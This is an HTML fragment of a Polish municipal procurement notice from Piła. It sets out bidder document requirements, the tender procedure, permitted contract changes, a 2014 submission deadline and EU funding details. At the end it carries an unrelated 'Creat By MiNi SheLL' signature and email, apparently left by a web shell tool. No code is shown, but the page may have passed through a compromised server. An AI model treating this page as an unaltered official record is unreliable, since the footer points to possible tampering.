<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - załącznik nr 2 do SIWZ.
2. Tabela elementów rozliczeniowych - załącznik nr 3 do SIWZ.
3. Podwykonawstwo - załącznik nr 11 do SIWZ).
4. Dokument zawierający pisemne zobowiązanie, zgodnie z art. 26 ust 2b ustawy Pzp, że wykonawca będzie dysponował zasobami do realizacji zamówienia jeżeli wykonawca, wykazując spełnianie warunków, będzie polegał na zasobach innych podmiotów.
5. Pełnomocnictwo do reprezentowania w postępowaniu (w przypadku podmiotów występujących wspólnie) przygotowane zgodnie z zapisami SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmianę osób, które będą uczestniczyły w wykonywaniu umowy na skutek np. śmierci, choroby lub innych
    zdarzeń losowych, niewywiązywania się z obowiązków wynikających z umowy lub jeżeli zmiana ta stanie
    się konieczna z jakichkolwiek innych przyczyn, np. rezygnacji z pełnienia określonej funkcji.
    Zmiana osób, które będą uczestniczyć w wykonaniu przedmiotu umowy może nastąpić po uzyskaniu
    pisemnej zgody Zamawiającego i spełnienia przez te osoby warunków SIWZ. 
    Zmiana ta nie wymaga aneksu do Umowy. 
2) Zmiany okresu przewidzianego na ukończenie prac: 
    2.1). Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
            wstrzymanie prac przez Zamawiającego lub rezygnację przez Zamawiającego z realizacji części
            przedmiotu umowy;
    2.2) Zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach
            zbliżonych do organów administracji, w szczególności eksploatatorów infrastruktury oraz właścicieli
            gruntów pod inwestycję, w tym:
            a) przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji nie ma - typowych w
                danych okolicznościach, terminów wydawania przez organy administracji lub inne podmioty decyzji,
                zezwoleń, uzgodnień itp;
            b) odmowa, zwłoka lub opóźnienie wydania przez organy administracji lub inne podmioty wymaganych
                decyzji, zezwoleń, uzgodnień z przyczyn niezależnych od Wykonawcy.
     2.3) Potrzeba dodatkowych uzgodnień w związku z kolizjami z planowanymi lub równolegle prowadzonymi
             przez inne podmioty inwestycjami.
3) Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
     3.1) Rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. Częściami  przedmiotu
            zamówienia są odrębne pozycje nr 1,  nr 2 , nr 3a, nr 3b - tabeli elementów  rozliczeniowych stanowiącej
            załącznik nr 2 do SIWZ. Rozliczenie nastąpi zgodnie z podanymi   przy nich kwotami. Zamawiający
            nie dopuszcza odbioru danej pozycji z tabeli elementów   rozliczeniowych jeżeli jest ona
            niezakończona.
    3.2) Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek  
            ewentualnych zmian zawartej przez Zamawiającego umowy o dofinansowanie przedsięwzięcia.
   
Każdy wniosek o zmianę zapisów umowy winien być przedłożony przez Wykonawcę pisemnie wraz  z uzasadnieniem. Zmiana zapisów umowy może być przez Zamawiającego uznana wyłącznie w zakresie określonym w art. 144 ust. 1 ustawy Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.um.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2014 godzina 09:00, miejsce: siedziba Zamawiającego Pl. Staszica 10, 64-920 Piła w pok. Nr 134, piętro I - Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest elementem projektu w ramach Priorytetu VII Pomoc techniczna, Działanie 7.1 Wsparcie instytucjonalno - kadrowe procesu zarządzania i wdrażania WRPO, Schemat II Inwestycje strategiczne, ujętego w Indykatywnym Wykazie Indywidualnych Projektów Kluczowych dla Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com